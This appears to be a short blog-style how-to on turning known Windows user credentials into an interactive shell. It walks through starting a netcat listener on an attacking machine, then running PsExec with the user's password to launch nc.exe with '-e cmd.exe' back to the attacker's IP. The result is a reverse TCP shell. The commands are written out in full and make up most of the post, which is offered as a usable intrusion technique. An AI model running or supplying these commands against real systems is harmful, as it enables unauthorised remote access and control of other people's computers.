First obviously you need the credentials of the user, we will say the username is "tom", the password is "iamtom" and we have a hostname of "TOMSCOMP".

Second you need PsExec.exe and nc.exe on the system.

You will need to start a listener on your attacking machine like so:

nc -lvp 8080


Next you need to execute nc.exe with PsExec.exe using the credentials of the user you want to intrude. My command looked like this

PsExec -u tom -p iamtom \\TOMSCOMP C:\path\to\nc.exe IP_OF_ATTACKING_SYSTEM 8080 -e C:\windows\system32\cmd.exe


This then spawned a reverse TCP shell using netcat that connected back to my attacking machine on port 8080 with a pretty cmd prompt as tom! Hopefully you thought this was interesting! I have seen a lot of frustration around this situation where one has credentials but can't seem to escalate with just a layer 4 shell. To a windows guru this is probably very basic, but to someone like me who grew up on Linux this is a beautiful find!